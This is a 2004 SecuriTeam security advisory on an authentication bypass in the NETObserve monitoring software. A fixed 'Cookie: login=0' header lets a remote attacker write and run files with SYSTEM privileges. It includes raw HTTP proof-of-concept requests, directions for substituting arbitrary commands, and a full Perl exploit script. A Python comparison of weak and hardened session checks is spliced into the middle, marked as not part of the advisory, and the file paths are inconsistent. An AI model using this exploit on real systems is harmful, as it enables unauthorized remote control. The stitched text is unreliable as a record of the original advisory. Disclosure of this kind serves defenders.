[NT] NETObserve Security Bypass Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 01/01/04

    To: list@securiteam.com
    Date: 1 Jan 2004 12:00:49 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      NETObserve Security Bypass Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    NETObserve (http://www.exploreanywhere.com/no-intro.php) is "your all in
    one solution to monitoring spouses, co-workers, children, employees and
    just about any other person you may be concerned about that is using your
    PC! NETObserve will monitor not only what is going on within your PC, but
    it can also record what is going on in front of your PC, with our
    breakthrough web cam surveillance technology! With NETObserve on your
    side, you will have remote, real-time access to your PC, allowing you to
    remotely control and monitor a PC while you are away! Read on to find out
    why NETObserve is leading the way in the cutting edge industry of PC
    monitoring, surveillance, and administration!".

    The product has been found to be very insecure: it allows a remote,
    unauthenticated attacker to create files on the remote computer, run
    them, view arbitrary files, and so on, all with SYSTEM privileges.

    DETAILS

    Vulnerable systems:
     * NETObserve version 2.95.2 and prior

    Security Bypass:
    NETObserve goes to some lengths to ensure that any remote user issuing
    commands to the server is authenticated: even if the remote user closes
    the browser, they must log in again before they can regain control of
    the remote system.

    Once a legitimate session has been established, the browser "proves" on
    each subsequent request that the commands it issues are allowed to be
    performed on the remote system by sending a special HTTP authentication
    header to the NETObserve server.

    The problem is that this header carries a fixed value rather than a
    secret tied to the session, so any malicious individual can attach the
    same header directly to a specially crafted request, and NETObserve
    blindly assumes that a session with a legitimate user is already in
    progress.

    The special header in question is nothing more than 'Cookie: login=0'.

    Proof of Concept Code:
    The following two HTTP requests will execute commands via the Windows
    command interpreter on the remote system:

    REQUEST #1:
    --------------------------------------------------------------------------
    POST /sendeditfile HTTP/1.1
    Accept: */*
    Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?
    Content-Type: application/x-www-form-urlencoded
    Host: AnyHostWillDo
    Content-Length: 25
    Cookie: login=0

    newfiledata=cmd+%2Fc+calc
    --------------------------------------------------------------------------

    REQUEST #2:
    --------------------------------------------------------------------------
    GET /runfile=?C:\windows\win.bat? HTTP/1.1
    Accept: */*
    Host: AnyHostWillDo
    Cookie: login=0

    --------------------------------------------------------------------------

    To change the commands to be run, alter the 'Content-Length' of the
    first request to be the length of the request body, including the
    string 'newfiledata='. Then alter the data being posted under
    'newfiledata', remembering to replace spaces with '+' and to URL-encode
    characters that have a special meaning in HTTP, such as '/' (which
    becomes '%2F').

    Sent unaltered, these two requests will execute the Windows calculator.
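    As an added illustration (not code from this advisory or from NETObserve), the
    following Python contrasts an authentication check of the kind the advisory
    describes, one that accepts a fixed client-supplied cookie value as proof of a
    session, with a check that only accepts tokens the server itself issued. The
    sample request, the SessionStore class and the verify callback are assumptions
    constructed for this example.

```python
import hmac
import secrets
from http.cookies import SimpleCookie

# Constructed sample request, modelled on the advisory's second PoC request:
# an unauthenticated client simply attaching the fixed 'Cookie: login=0'.
FORGED_REQUEST = (
    "GET /runfile=?C:\\WINNT\\win.bat? HTTP/1.1\r\n"
    "Host: AnyHostWillDo\r\n"
    "Cookie: login=0\r\n\r\n"
)


def parse_cookies(raw_request: str) -> dict:
    """Return the Cookie header of a raw HTTP request as a name -> value dict."""
    jar = SimpleCookie()
    for line in raw_request.split("\r\n"):
        if line.lower().startswith("cookie:"):
            jar.load(line.split(":", 1)[1].strip())
    return {name: morsel.value for name, morsel in jar.items()}


def netobserve_style_check(raw_request: str) -> bool:
    """Weak check as the advisory describes it: the presence of the fixed
    value login=0 is taken as proof of an authenticated session, so any
    client that knows the value passes."""
    return parse_cookies(raw_request).get("login") == "0"


class SessionStore:
    """Hardened pattern: a session exists only if the server created it
    after a successful login, under an unguessable token it generated."""

    def __init__(self):
        self._active = set()

    def login(self, username: str, password: str, verify) -> str:
        # 'verify' is an assumed callback that checks the credentials.
        if not verify(username, password):
            raise PermissionError("bad credentials")
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._active.add(token)
        return token

    def is_authenticated(self, raw_request: str) -> bool:
        token = parse_cookies(raw_request).get("session", "")
        # Constant-time comparison against each issued token avoids timing leaks.
        return any(hmac.compare_digest(token.encode(), t.encode())
                   for t in self._active)
```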

    Exploit:
    #!/usr/bin/perl
    #
    # Exploit by SecurITeam
    use strict;
    use warnings;
    use IO::Socket;

    unless (@ARGV == 1) { die "usage: $0 host\n" }
    my $host   = shift(@ARGV);
    my $MAXLEN = 256;

    # Open a TCP connection to the NETObserve web server on the given host.
    sub connect_to {
        my ($h) = @_;
        my $sock = IO::Socket::INET->new( Proto    => "tcp",
                                          PeerAddr => $h,
                                          PeerPort => "http(80)",
                                        );
        unless ($sock) { die "cannot connect to http daemon on $h" }
        $sock->autoflush(1);
        return $sock;
    }

    # Send one raw HTTP request, print the first bytes of the reply, close.
    sub send_request {
        my ($h, $request) = @_;
        my $sock = connect_to($h);
        print $sock $request;
        sleep(1);
        my $newmsg;
        if (defined $sock->recv($newmsg, $MAXLEN)) {
            print "Result: $newmsg\n";
        }
        sleep(1);
        close $sock;
    }

    # Request 1: write the command line into win.bat via /sendeditfile.
    # 'Cookie: login=0' is the fixed header the server accepts as proof of
    # an authenticated session. Content-Length is computed from the body
    # (25 bytes for the default payload), so changing the body needs no
    # manual adjustment.
    my $body    = "newfiledata=cmd+%2Fc+calc";
    my $request = join("\r\n",
        "POST /sendeditfile HTTP/1.1",
        "Accept: */*",
        "Referer: http://$host/editfile=?C:\\WINNT\\win.bat?",
        "Content-Type: application/x-www-form-urlencoded",
        "Host: $host",
        "Connection: close",
        "Content-Length: " . length($body),
        "Cookie: login=0",
        "",
        $body);
    send_request($host, $request);

    #----

    # Request 2: execute the batch file just written via /runfile.
    $request = join("\r\n",
        "GET /runfile=?C:\\WINNT\\win.bat? HTTP/1.1",
        "Accept: */*",
        "Host: AnyHostWillDo",
        "Cookie: login=0",
        "",
        "");
    send_request($host, $request);

    ADDITIONAL INFORMATION

    The original advisory can be found at:
    http://www.elitehaven.net/netobserve.txt

    The information has been provided by Peter Winter-Smith
    (peter4020@hotmail.com) and SecurITeam (expert@securiteam.com).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

